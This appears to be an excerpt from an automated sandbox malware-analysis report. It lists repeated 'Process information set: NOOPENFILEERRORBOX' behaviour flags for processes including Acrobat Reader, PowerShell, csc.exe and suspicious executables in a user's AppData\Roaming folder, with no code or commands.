                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\sihost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeProcess information set: NOOPENFILEERRORBOX
